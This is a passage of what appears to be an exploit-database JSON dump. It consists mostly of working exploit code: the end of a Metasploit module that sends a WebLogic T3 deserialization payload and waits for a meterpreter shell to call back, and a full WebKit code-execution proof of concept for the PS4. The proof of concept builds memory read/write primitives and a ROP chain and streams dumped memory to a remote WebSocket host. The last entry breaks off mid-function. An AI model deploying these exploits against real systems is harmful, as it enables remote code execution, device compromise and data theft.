on_client_connect(client)\n # Make sure to only sent one meterpreter payload to a host.\n # During testing the remote host called back up to 11 times\n # (or as long as the server was listening).\n vprint_status(\"Comparing host: #{client.peerhost}\")\n if @met_sent.include?(client.peerhost) then return end\n @met_sent << client.peerhost\n\n vprint_status(\"met_sent: #{@met_sent}\")\n\n # Response format determined by watching network traffic\n # generated by EDB PoC\n accept_conn = '4e00'\n raccept_conn = client.peerhost.each_byte.map {|b| b.to_s(16)}.join\n accept_conn << (raccept_conn.length >> 1).to_s(16).rjust(2,'0')\n accept_conn << raccept_conn\n accept_conn << '0000'\n accept_conn << client.peerport.to_s(16).rjust(4,'0')\n\n client.put([accept_conn].pack('H*'))\n client.put([@resp].pack('H*'))\n end\n\n def t3_handshake\n shake = '74332031322e322e310a41533a323535'\n shake << '0a484c3a31390a4d533a313030303030'\n shake << '30300a0a'\n\n sock.put([shake].pack('H*'))\n sleep(1)\n sock.get_once\n end\n\n def build_t3_request_object\n # data block is from EDB PoC\n data = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a'\n data << '56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278'\n data << '700000000a000000030000000000000006007070707070700000000a00000003'\n data << '0000000000000006007006fe010000aced00057372001d7765626c6f6769632e'\n data << '726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078'\n data << '707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e506163'\n data << '6b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d69'\n data << '6e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b'\n data << '5a000e74656d706f7261727950617463684c0009696d706c5469746c65740012'\n data << '4c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271'\n data << '007e00034c000b696d706c56657273696f6e71007e000378707702000078fe01'\n data << '0000aced00057372001d7765626c6f6769632e726a766d2e436c617373546162'\n data << '6c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e'\n data << '636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f9722455164'\n data << '52463e0200035b00087061636b616765737400275b4c7765626c6f6769632f63'\n data << '6f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e7265'\n data << '6c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e67'\n data << '3b5b001276657273696f6e496e666f417342797465737400025b427872002477'\n data << '65626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b61676549'\n data << '6e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f724900'\n data << '0c726f6c6c696e67506174636849000b736572766963655061636b5a000e7465'\n data << '6d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a'\n data << '696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e'\n data << '000478707702000078fe010000aced00057372001d7765626c6f6769632e726a'\n data << '766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c0000787072'\n data << '00217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5065657249'\n data << '6e666f585474f39bc908f10200064900056d616a6f724900056d696e6f724900'\n data << '0c726f6c6c696e67506174636849000b736572766963655061636b5a000e7465'\n data << '6d706f7261727950617463685b00087061636b616765737400275b4c7765626c'\n data << '6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f'\n data << '3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5665'\n data << '7273696f6e496e666f972245516452463e0200035b00087061636b6167657371'\n data << '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c61'\n data << '6e672f537472696e673b5b001276657273696f6e496e666f4173427974657374'\n data << '00025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c'\n data << '2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f7249'\n data << '00056d696e6f7249000c726f6c6c696e67506174636849000b73657276696365'\n data << '5061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c'\n data << '6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56'\n data << '657273696f6e71007e000578707702000078fe00fffe010000aced0005737200'\n data << '137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078'\n data << '707750210000000000000000000d3139322e3136382e312e323237001257494e'\n data << '2d4147444d565155423154362e656883348cd6000000070000'\n\n data << rport.to_s(16).rjust(4, '0')\n\n data << 'ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced00'\n data << '05737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a'\n data << '0c0000787077200114dc42bd071a7727000d3234322e3231342e312e32353461'\n data << '863d1d0000000078'\n\n sock.put([data].pack('H*'))\n sleep(2)\n sock.get_once\n end\n\n def send_payload_objdata\n # JRMPClient2 payload generated from EDB PoC:\n # python exploit.py <rhost> <rport> ysoserial-0.0.6-SNAPSHOT-BETA-all.jar <lhost> <lport> JRMPClient2\n # Patch in srvhost and srvport\n payload = '056508000000010000001b0000005d0101007372017870737202787000000000'\n payload << '00000000757203787000000000787400087765626c6f67696375720478700000'\n payload << '000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced'\n payload << '00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e'\n payload << '7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e0020000'\n payload << '78707702000078fe010000aced00057372001d7765626c6f6769632e726a766d'\n payload << '2e436c6173735461626c65456e7472792f52658157f4f9ed0c00007870720013'\n payload << '5b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c0200007870'\n payload << '7702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e43'\n payload << '6c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a61'\n payload << '76612e7574696c2e566563746f72d9977d5b803baf0103000349001163617061'\n payload << '63697479496e6372656d656e7449000c656c656d656e74436f756e745b000b65'\n payload << '6c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b'\n payload << '78707702000078fe010000'\n\n # Data\n payload << 'aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e'\n payload << '416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50'\n payload << '726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e67'\n payload << '2f7265666c6563742f496e766f636174696f6e48616e646c65723b7870737200'\n payload << '2d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e76'\n payload << '6f636174696f6e48616e646c657200000000000000020200007872001c6a6176'\n payload << '612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c6133'\n payload << '1e030000787077'\n\n unicast_srvhost = srvhost.each_byte.map { |b| b.to_s(16) }.join\n unicast_dat = '000a556e696361737452656600'\n unicast_dat << (unicast_srvhost.length >> 1).to_s(16).rjust(2,'0')\n unicast_dat << unicast_srvhost\n unicast_dat << '0000'\n unicast_dat << srvport.to_s(16).rjust(4,'0')\n unicast_dat << '000000004e18654b000000000000000000000000000000'\n unicast_dat << '78'\n\n payload << ((unicast_dat.length >> 1) - 1).to_s(16).rjust(2,'0')\n payload << unicast_dat\n\n payload << 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461'\n payload << '626c6553657276696365436f6e74657874ddcba8706386f0ba0c000078720029'\n payload << '7765626c6f6769632e726d692e70726f76696465722e42617369635365727669'\n payload << '6365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765'\n payload << '626c6f6769632e726d692e696e7465726e616c2e4d6574686f64446573637269'\n payload << '70746f7212485a828af7f67b0c000078707734002e61757468656e7469636174'\n payload << '65284c7765626c6f6769632e73656375726974792e61636c2e55736572496e66'\n payload << '6f3b290000001b7878fe00ff'\n\n data = ((payload.length >> 1) + 4).to_s(16).rjust(8,'0')\n data << payload\n\n sock.put([data].pack('H*'))\n sleep(1)\n sock.put([data].pack('H*'))\n sleep(1)\n sock.get_once\n end\n\n def exploit\n @met_sent = []\n gen_resp\n\n connect\n vprint_status('Sending handshake...')\n t3_handshake\n\n build_t3_request_object\n\n start_service\n\n vprint_status('Sending payload...')\n send_payload_objdata\n\n # Need to wait this long to make sure we get a shell back\n sleep(10)\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/misc/weblogic_deserialize.rb"}], "dsquare": [{"lastseen": "2018-04-08T18:10:54", "bulletinFamily": "exploit", "description": "SQL Injection vulnerabilty in Zenario CMS X-FORWARDED-FOR header\n\nVulnerability Type: SQL Injection", "modified": "2018-03-20T00:00:00", "published": "2018-03-20T00:00:00", "id": "E-631", "href": "", "type": "dsquare", "title": "Zenario CMS SQL Injection", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-03-17T03:09:32", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category local exploits", "modified": "2018-03-13T00:00:00", "published": "2018-03-13T00:00:00", "href": "https://0day.today/exploit/description/29989", "id": "1337DAY-ID-29989", "title": "Sony Playstation 4 (PS4) 4.55 < 5.50 - WebKit Code Execution (PoC) Exploit", "type": "zdt", "sourceData": "<--- index.html --->\r\n<html>\r\n <body>\r\n <script>\r\n window.didload = 0;\r\n window.didpost = 0;\r\n window.onload = function() {\r\n window.didload = 1;\r\n if (window.didpost == 1)\r\n window.stage2();\r\n }\r\n window.postExpl = function() {\r\n window.didpost = 1;\r\n if (window.didload == 1)\r\n window.stage2();\r\n }\r\n </script>\r\n <script src=\"./expl.js\"></script>\r\n <script src=\"./rop.js\"></script>\r\n <pre id=\"console\"></pre>\r\n </body>\r\n</html>\r\n<--- /index.html --->\r\n \r\n \r\n<--- expl.js --->\r\nfunction makeid() {\r\n var text = \"\";\r\n var possible = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789\";\r\n \r\n for (var i = 0; i < 8; i++)\r\n text += possible.charAt(Math.floor(Math.random() * possible.length));\r\n \r\n return text;\r\n};\r\n \r\nvar instancespr = [];\r\n \r\nfor (var i = 0; i < 4096; i++) {\r\n instancespr[i] = new Uint32Array(1);\r\n instancespr[i][makeid()] = 50057; /* spray 4-field Object InstanceIDs */\r\n}\r\n \r\nvar _dview;\r\n \r\nfunction u2d(low, hi) {\r\n if (!_dview) _dview = new DataView(new ArrayBuffer(16));\r\n _dview.setUint32(0, hi);\r\n _dview.setUint32(4, low);\r\n return _dview.getFloat64(0);\r\n}\r\nvar dgc = function() {\r\n for (var i = 0; i < 0x100; i++) {\r\n new ArrayBuffer(0x100000);\r\n }\r\n}\r\n \r\nfunction int64(low, hi) {\r\n this.low = (low >>> 0);\r\n this.hi = (hi >>> 0);\r\n \r\n this.add32inplace = function(val) {\r\n var new_lo = (((this.low >>> 0) + val) & 0xFFFFFFFF) >>> 0;\r\n var new_hi = (this.hi >>> 0);\r\n \r\n if (new_lo < this.low) {\r\n new_hi++;\r\n }\r\n \r\n this.hi = new_hi;\r\n this.low = new_lo;\r\n }\r\n \r\n this.add32 = function(val) {\r\n var new_lo = (((this.low >>> 0) + val) & 0xFFFFFFFF) >>> 0;\r\n var new_hi = (this.hi >>> 0);\r\n \r\n if (new_lo < this.low) {\r\n new_hi++;\r\n }\r\n \r\n return new int64(new_lo, new_hi);\r\n }\r\n \r\n this.sub32 = function(val) {\r\n var new_lo = (((this.low >>> 0) - val) & 0xFFFFFFFF) >>> 0;\r\n var new_hi = (this.hi >>> 0);\r\n \r\n if (new_lo > (this.low) & 0xFFFFFFFF) {\r\n new_hi--;\r\n }\r\n \r\n return new int64(new_lo, new_hi);\r\n }\r\n \r\n this.sub32inplace = function(val) {\r\n var new_lo = (((this.low >>> 0) - val) & 0xFFFFFFFF) >>> 0;\r\n var new_hi = (this.hi >>> 0);\r\n \r\n if (new_lo > (this.low) & 0xFFFFFFFF) {\r\n new_hi--;\r\n }\r\n \r\n this.hi = new_hi;\r\n this.low = new_lo;\r\n }\r\n \r\n this.and32 = function(val) {\r\n var new_lo = this.low & val;\r\n var new_hi = this.hi;\r\n return new int64(new_lo, new_hi);\r\n }\r\n \r\n this.and64 = function(vallo, valhi) {\r\n var new_lo = this.low & vallo;\r\n var new_hi = this.hi & valhi;\r\n return new int64(new_lo, new_hi);\r\n }\r\n \r\n this.toString = function(val) {\r\n val = 16;\r\n var lo_str = (this.low >>> 0).toString(val);\r\n var hi_str = (this.hi >>> 0).toString(val);\r\n \r\n if (this.hi == 0)\r\n return lo_str;\r\n else\r\n lo_str = zeroFill(lo_str, 8)\r\n \r\n return hi_str + lo_str;\r\n }\r\n \r\n this.toPacked = function() {\r\n return {\r\n hi: this.hi,\r\n low: this.low\r\n };\r\n }\r\n \r\n this.setPacked = function(pck) {\r\n this.hi = pck.hi;\r\n this.low = pck.low;\r\n return this;\r\n }\r\n \r\n return this;\r\n}\r\n \r\nfunction zeroFill(number, width) {\r\n width -= number.toString().length;\r\n \r\n if (width > 0) {\r\n return new Array(width + (/\\./.test(number) ? 2 : 1)).join('0') + number;\r\n }\r\n \r\n return number + \"\"; // always return a string\r\n}\r\n \r\nvar nogc = [];\r\n \r\nvar fail = function() {\r\n alert.apply(null, arguments);\r\n throw \"fail\";\r\n}\r\n \r\n// Target JSObject for overlap\r\nvar tgt = {\r\n a: 0,\r\n b: 0,\r\n c: 0,\r\n d: 0\r\n}\r\n \r\nvar y = new ImageData(1, 0x4000)\r\npostMessage(\"\", \"*\", [y.data.buffer]);\r\n \r\n// Spray properties to ensure object is fastmalloc()'d and can be found easily later\r\nvar props = {};\r\n \r\nfor (var i = 0;\r\n (i < (0x4000 / 2));) {\r\n props[i++] = {\r\n value: 0x42424242\r\n };\r\n props[i++] = {\r\n value: tgt\r\n };\r\n}\r\n \r\nvar foundLeak = undefined;\r\nvar foundIndex = 0;\r\nvar maxCount = 0x100;\r\n \r\nwhile (foundLeak == undefined && maxCount > 0) {\r\n maxCount--;\r\n \r\n history.pushState(y, \"\");\r\n \r\n Object.defineProperties({}, props);\r\n \r\n var leak = new Uint32Array(history.state.data.buffer);\r\n \r\n for (var i = 0; i < leak.length - 6; i++) {\r\n if (\r\n leak[i] == 0x42424242 &&\r\n leak[i + 0x1] == 0xFFFF0000 &&\r\n leak[i + 0x2] == 0x00000000 &&\r\n leak[i + 0x3] == 0x00000000 &&\r\n leak[i + 0x4] == 0x00000000 &&\r\n leak[i + 0x5] == 0x00000000 &&\r\n leak[i + 0x6] == 0x0000000E &&\r\n leak[i + 0x7] == 0x00000000 &&\r\n leak[i + 0xA] == 0x00000000 &&\r\n leak[i + 0xB] == 0x00000000 &&\r\n leak[i + 0xC] == 0x00000000 &&\r\n leak[i + 0xD] == 0x00000000 &&\r\n leak[i + 0xE] == 0x0000000E &&\r\n leak[i + 0xF] == 0x00000000\r\n ) {\r\n foundIndex = i;\r\n foundLeak = leak;\r\n break;\r\n }\r\n }\r\n}\r\n \r\nif (!foundLeak) {\r\n failed = true\r\n fail(\"Failed to find leak!\")\r\n}\r\n \r\nvar firstLeak = Array.prototype.slice.call(foundLeak, foundIndex, foundIndex + 0x40);\r\nvar leakJSVal = new int64(firstLeak[8], firstLeak[9]);\r\n \r\nArray.prototype.__defineGetter__(100, () => 1);\r\n \r\nvar f = document.body.appendChild(document.createElement('iframe'));\r\nvar a = new f.contentWindow.Array(13.37, 13.37);\r\nvar b = new f.contentWindow.Array(u2d(leakJSVal.low + 0x10, leakJSVal.hi), 13.37);\r\n \r\nvar master = new Uint32Array(0x1000);\r\nvar slave = new Uint32Array(0x1000);\r\nvar leakval_u32 = new Uint32Array(0x1000);\r\nvar leakval_helper = [slave, 2, 3, 4, 5, 6, 7, 8, 9, 10];\r\n \r\n// Create fake ArrayBufferView\r\ntgt.a = u2d(2048, 0x1602300);\r\ntgt.b = 0;\r\ntgt.c = leakval_helper;\r\ntgt.d = 0x1337;\r\n \r\nvar c = Array.prototype.concat.call(a, b);\r\ndocument.body.removeChild(f);\r\nvar hax = c[0];\r\nc[0] = 0;\r\n \r\ntgt.c = c;\r\n \r\nhax[2] = 0;\r\nhax[3] = 0;\r\n \r\nObject.defineProperty(Array.prototype, 100, {\r\n get: undefined\r\n});\r\n \r\ntgt.c = leakval_helper;\r\nvar butterfly = new int64(hax[2], hax[3]);\r\nbutterfly.low += 0x10;\r\n \r\ntgt.c = leakval_u32;\r\nvar lkv_u32_old = new int64(hax[4], hax[5]);\r\nhax[4] = butterfly.low;\r\nhax[5] = butterfly.hi;\r\n// Setup read/write primitive\r\n \r\ntgt.c = master;\r\nhax[4] = leakval_u32[0];\r\nhax[5] = leakval_u32[1];\r\n \r\nvar addr_to_slavebuf = new int64(master[4], master[5]);\r\ntgt.c = leakval_u32;\r\nhax[4] = lkv_u32_old.low;\r\nhax[5] = lkv_u32_old.hi;\r\n \r\ntgt.c = 0;\r\nhax = 0;\r\n \r\nvar prim = {\r\n write8: function(addr, val) {\r\n master[4] = addr.low;\r\n master[5] = addr.hi;\r\n \r\n if (val instanceof int64) {\r\n slave[0] = val.low;\r\n slave[1] = val.hi;\r\n } else {\r\n slave[0] = val;\r\n slave[1] = 0;\r\n }\r\n \r\n master[4] = addr_to_slavebuf.low;\r\n master[5] = addr_to_slavebuf.hi;\r\n },\r\n \r\n write4: function(addr, val) {\r\n master[4] = addr.low;\r\n master[5] = addr.hi;\r\n \r\n slave[0] = val;\r\n \r\n master[4] = addr_to_slavebuf.low;\r\n master[5] = addr_to_slavebuf.hi;\r\n },\r\n \r\n read8: function(addr) {\r\n master[4] = addr.low;\r\n master[5] = addr.hi;\r\n \r\n var rtv = new int64(slave[0], slave[1]);\r\n \r\n master[4] = addr_to_slavebuf.low;\r\n master[5] = addr_to_slavebuf.hi;\r\n \r\n return rtv;\r\n },\r\n \r\n read4: function(addr) {\r\n master[4] = addr.low;\r\n master[5] = addr.hi;\r\n \r\n var rtv = slave[0];\r\n \r\n master[4] = addr_to_slavebuf.low;\r\n master[5] = addr_to_slavebuf.hi;\r\n \r\n return rtv;\r\n },\r\n \r\n leakval: function(jsval) {\r\n leakval_helper[0] = jsval;\r\n var rtv = this.read8(butterfly);\r\n this.write8(butterfly, new int64(0x41414141, 0xffff0000));\r\n \r\n return rtv;\r\n },\r\n \r\n createval: function(jsval) {\r\n this.write8(butterfly, jsval);\r\n var rt = leakval_helper[0];\r\n this.write8(butterfly, new int64(0x41414141, 0xffff0000));\r\n return rt;\r\n }\r\n};\r\n \r\nwindow.primitives = prim;\r\nif (window.postExpl) window.postExpl();\r\n<--- /expl.js --->\r\n \r\n \r\n<--- rop.js -->\r\nvar p;\r\nvar xhr_sync_log = function(str) {\r\n var req = new XMLHttpRequest();\r\n req.open('GET', \"log?\" + str, false);\r\n try {\r\n req.send();\r\n } catch(e){}\r\n}\r\nvar findModuleBaseXHR = function(addr)\r\n{\r\n var addr_ = addr.add32(0); // copy\r\n addr_.low &= 0xFFFFF000;\r\n xhr_sync_log(\"START: \" + addr_);\r\n \r\n while (1) {\r\n var vr = p.read4(addr_.add32(0x110-4));\r\n xhr_sync_log(\"step\" + addr_);\r\n addr_.sub32inplace(0x1000);\r\n }\r\n}\r\nvar log = function(x) {\r\n document.getElementById(\"console\").innerText += x + \"\\n\";\r\n}\r\nvar print = function(string) { // like log but html\r\n document.getElementById(\"console\").innerHTML += string + \"\\n\";\r\n}\r\n \r\nvar dumpModuleXHR = function(moduleBase) {\r\n var chunk = new ArrayBuffer(0x1000);\r\n var chunk32 = new Uint32Array(chunk);\r\n var chunk8 = new Uint8Array(chunk);\r\n connection = new WebSocket('ws://10.17.0.1:8080');\r\n connection.binaryType = \"arraybuffer\";\r\n var helo = new Uint32Array(1);\r\n helo[0] = 0x41414141;\r\n \r\n var moduleBase_ = moduleBase.add32(0);\r\n connection.onmessage = function() {\r\n try {\r\n for (var i = 0; i < chunk32.length; i++)\r\n {\r\n var val = p.read4(moduleBase_);\r\n chunk32[i] = val;\r\n moduleBase_.add32inplace(4);\r\n }\r\n connection.send(chunk8);\r\n } catch (e) {\r\n print(e);\r\n }\r\n }\r\n}\r\nvar get_jmptgt = function(addr)\r\n{\r\n var z=p.read4(addr) & 0xFFFF;\r\n var y=p.read4(addr.add32(2));\r\n if (z != 0x25ff) return 0;\r\n \r\n return addr.add32(y+6);\r\n \r\n}\r\nvar gadgetmap_wk = {\r\n \"ep\": [0x5B, 0x41, 0x5C, 0x41, 0x5D, 0x41, 0x5E, 0x41, 0x5F, 0x5D, 0xC3],\r\n \"pop rsi\": [0x5E, 0xC3],\r\n \"pop rdi\": [0x5F, 0xC3],\r\n \"pop rsp\": [0x5c, 0xC3],\r\n \"pop rax\": [0x58, 0xC3],\r\n \"pop rdx\": [0x5a, 0xC3],\r\n \"pop rcx\": [0x59, 0xC3],\r\n \"pop rsp\": [0x5c, 0xC3],\r\n \"pop rbp\": [0x5d, 0xC3],\r\n \"pop r8\": [0x47, 0x58, 0xC3],\r\n \"pop r9\": [0x47, 0x59, 0xC3],\r\n \"infloop\": [0xEB, 0xFE, 0xc3],\r\n \"ret\": [0xC3],\r\n \"mov [rdi], rsi\": [0x48, 0x89, 0x37, 0xC3],\r\n \"mov [rax], rsi\": [0x48, 0x89, 0x30, 0xC3],\r\n \"mov [rdi], rax\": [0x48, 0x89, 0x07, 0xC3],\r\n \"mov rxa, rdi\": [0x48, 0x89, 0xF8, 0xC3]\r\n};\r\nvar slowpath_jop = [0x48, 0x8B, 0x7F, 0x48, 0x48, 0x8B, 0x07, 0x48, 0x8B, 0x40, 0x30, 0xFF, 0xE0];\r\nslowpath_jop.reverse();\r\n \r\nvar gadgets;\r\nwindow.stage2 = function() {\r\n try {\r\n window.stage2_();\r\n } catch (e) {\r\n print(e);\r\n }\r\n}\r\nvar gadgetcache = {\"ret\":60,\"ep\":173,\"pop rbp\":182,\"pop rax\":17781,\"mov rax, rdi\":23248,\"pop r8\":100517,\"pop rsp\":128173,\"mov [rdi], rsi\":150754,\"pop rcx\":169041,\"pop rdi\":239071,\"pop rsi\":597265,\"mov [rdi], rax\":782172,\"jop\":813600,\"pop rdx\":1092690,\"mov [rax], rsi\":2484823,\"pop r9\":21430095,\"infloop\":22604906}, gadgetoffs = {};\r\nwindow.stage2_ = function() {\r\n p = window.prim;\r\n print (\"[+] exploit succeeded\");\r\n print(\"webkit exploit result: \" + p.leakval(0x41414141));\r\n print (\"--- welcome to stage2 ---\");\r\n p.leakfunc = function(func)\r\n {\r\n var fptr_store = p.leakval(func);\r\n return (p.read8(fptr_store.add32(0x18))).add32(0x40);\r\n }\r\n gadgetconn = 0;\r\n if (!gadgetcache)\r\n gadgetconn = new WebSocket('ws://10.17.0.1:8080');\r\n \r\n var parseFloatStore = p.leakfunc(parseFloat);\r\n var parseFloatPtr = p.read8(parseFloatStore);\r\n print(\"parseFloat at: 0x\" + parseFloatPtr);\r\n var webKitBase = p.read8(parseFloatStore);\r\n window.webKitBase = webKitBase;\r\n \r\n webKitBase.low &= 0xfffff000;\r\n webKitBase.sub32inplace(0x5b7000-0x1C000);\r\n \r\n print(\"libwebkit base at: 0x\" + webKitBase);\r\n \r\n var o2wk = function(o)\r\n {\r\n return webKitBase.add32(o);\r\n }\r\n \r\n gadgets = {\r\n \"stack_chk_fail\": o2wk(0xc8),\r\n \"memset\": o2wk(0x228),\r\n \"setjmp\": o2wk(0x14f8)\r\n };\r\n/*\r\n var libSceLibcInternalBase = p.read8(get_jmptgt(gadgets.memset));\r\n libSceLibcInternalBase.low &= ~0x3FFF;\r\n libSceLibcInternalBase.sub32inplace(0x20000);\r\n print(\"libSceLibcInternal: 0x\" + libSceLibcInternalBase.toString());\r\n window.libSceLibcInternalBase = libSceLibcInternalBase;\r\n*/\r\n var libKernelBase = p.read8(get_jmptgt(gadgets.stack_chk_fail));\r\n window.libKernelBase = libKernelBase;\r\n libKernelBase.low &= 0xfffff000;\r\n libKernelBase.sub32inplace(0x12000);\r\n print(\"libkernel_web base at: 0x\" + libKernelBase);\r\n \r\n \r\n var o2lk = function(o)\r\n {\r\n return libKernelBase.add32(o);\r\n }\r\n window.o2lk = o2lk;\r\n \r\n var wkview = new Uint8Array(0x1000);\r\n var wkstr = p.leakval(wkview).add32(0x10);\r\n var orig_wkview_buf = p.read8(wkstr);\r\n \r\n p.write8(wkstr, webKitBase);\r\n p.write4(wkstr.add32(8), 0x367c000);\r\n \r\n var gadgets_to_find = 0;\r\n var gadgetnames = [];\r\n for (var gadgetname in gadgetmap_wk) {\r\n if (gadgetmap_wk.hasOwnProperty(gadgetname)) {\r\n gadgets_to_find++;\r\n gadgetnames.push(gadgetname);\r\n gadgetmap_wk[gadgetname].reverse();\r\n }\r\n }\r\n log(\"finding gadgets\");\r\n \r\n gadgets_to_find++; // slowpath_jop\r\n \r\n var findgadget = function(donecb) {\r\n if (gadgetcache)\r\n {\r\n gadgets_to_find=0;\r\n slowpath_jop=0;\r\n log(\"using cached gadgets\");\r\n \r\n for (var gadgetname in gadgetcache) {\r\n if (gadgetcache.hasOwnProperty(gadgetname)) {\r\n gadgets[gadgetname] = o2wk(gadgetcache[gadgetname]);\r\n }\r\n }\r\n \r\n } else {\r\n for (var i=0; i < wkview.length; i++)\r\n {\r\n if (wkview[i] == 0xc3)\r\n {\r\n for (var nl=0; nl < gadgetnames.length; nl++)\r\n {\r\n var found = 1;\r\n if (!gadgetnames[nl]) continue;\r\n var gadgetbytes = gadgetmap_wk[gadgetnames[nl]];\r\n for (var compareidx = 0; compareidx < gadgetbytes.length; compareidx++)\r\n {\r\n if (gadgetbytes[compareidx] != wkview[i - compareidx]){\r\n found = 0;\r\n break;\r\n }\r\n }\r\n if (!found) continue;\r\n gadgets[gadgetnames[nl]] = o2wk(i - gadgetbytes.length + 1);\r\n gadgetoffs[gadgetnames[nl]] = i - gadgetbytes.length + 1;\r\n delete gadgetnames[nl];\r\n gadgets_to_find--;\r\n }\r\n } else if (wkview[i] == 0xe0 && wkview[i-1] == 0xff && slowpath_jop)\r\n {\r\n var found = 1;\r\n for (var compareidx = 0; compareidx < slowpath_jop.length; compareidx++)\r\n {\r\n if (slowpath_jop[compareidx] != wkview[i - compareidx])\r\n {\r\n found = 0;\r\n break;\r\n }\r\n }\r\n if (!found) continue;\r\n gadgets[\"jop\"] = o2wk(i - slowpath_jop.length + 1);\r\n gadgetoffs[\"jop\"] = i - slowpath_jop.length + 1;\r\n gadgets_to_find--;\r\n slowpath_jop = 0;\r\n }\r\n \r\n if (!gadgets_to_find) break;\r\n }\r\n }\r\n if (!gadgets_to_find && !slowpath_jop) {\r\n log(\"found gadgets\");\r\n if (gadgetconn)\r\n gadgetconn.onopen = function(e){\r\n gadgetconn.send(JSON.stringify(gadgetoffs));\r\n }\r\n setTimeout(donecb, 50);\r\n } else {\r\n log(\"missing gadgets: \");\r\n for (var nl in gadgetnames) {\r\n log(\" - \" + gadgetnames[nl]);\r\n }\r\n if(slowpath_jop) log(\" - jop gadget\");\r\n }\r\n }\r\n findgadget(function(){});\r\n var hold1;\r\n var hold2;\r\n var holdz;\r\n var holdz1;\r\n \r\n while (1)\r\n {\r\n hold1 = {a:0, b:0, c:0, d:0};\r\n hold2 = {a:0, b:0, c:0, d:0};\r\n holdz1 = p.leakval(hold2);\r\n holdz = p.leakval(hold1);\r\n if (holdz.low - 0x30 == holdz1.low) break;\r\n }\r\n \r\n var pushframe = [];\r\n pushframe.length = 0x80;\r\n var funcbuf;\r\n \r\n \r\n var launch_chain = function(chain)\r\n {\r\n \r\n var stackPointer = 0;\r\n var stackCookie = 0;\r\n var orig_reenter_rip = 0;\r\n \r\n var reenter_help = {length: {valueOf: function(){\r\n orig_reenter_rip = p.read8(stackPointer);\r\n stackCookie = p.read8(stackPointer.add32(8));\r\n var returnToFrame = stackPointer;\r\n \r\n var ocnt = chain.count;\r\n chain.push_write8(stackPointer, orig_reenter_rip);\r\n chain.push_write8(stackPointer.add32(8), stackCookie);\r\n \r\n if (chain.runtime) returnToFrame=chain.runtime(stackPointer);\r\n \r\n chain.push(gadgets[\"pop rsp\"]); // pop rsp\r\n chain.push(returnToFrame); // -> back to the trap life\r\n chain.count = ocnt;\r\n \r\n p.write8(stackPointer, (gadgets[\"pop rsp\"])); // pop rsp\r\n p.write8(stackPointer.add32(8), chain.ropframeptr); // -> rop frame\r\n }}};\r\n \r\n var funcbuf32 = new Uint32Array(0x100);\r\n nogc.push(funcbuf32);\r\n funcbuf = p.read8(p.leakval(funcbuf32).add32(0x10));\r\n \r\n p.write8(funcbuf.add32(0x30), gadgets[\"setjmp\"]);\r\n p.write8(funcbuf.add32(0x80), gadgets[\"jop\"]);\r\n p.write8(funcbuf,funcbuf);\r\n p.write8(parseFloatStore, gadgets[\"jop\"]);\r\n var orig_hold = p.read8(holdz1);\r\n var orig_hold48 = p.read8(holdz1.add32(0x48));\r\n \r\n p.write8(holdz1, funcbuf.add32(0x50));\r\n p.write8(holdz1.add32(0x48), funcbuf);\r\n parseFloat(hold2,hold2,hold2,hold2,hold2,hold2);\r\n p.write8(holdz1, orig_hold);\r\n p.write8(holdz1.add32(0x48), orig_hold48);\r\n \r\n stackPointer = p.read8(funcbuf.add32(0x10));\r\n rtv=Array.prototype.splice.apply(reenter_help);\r\n return p.leakval(rtv);\r\n }\r\n \r\n \r\n gadgets = gadgets;\r\n p.loadchain = launch_chain;\r\n window.RopChain = function () {\r\n this.ropframe = new Uint32Array(0x10000);\r\n this.ropframeptr = p.read8(p.leakval(this.ropframe).add32(0x10));\r\n this.count = 0;\r\n this.clear = function() {\r\n this.count = 0;\r\n this.runtime = undefined;\r\n for (var i = 0; i < 0x1000/8; i++)\r\n {\r\n p.write8(this.ropframeptr.add32(i*8), 0);\r\n }\r\n };\r\n this.pushSymbolic = function() 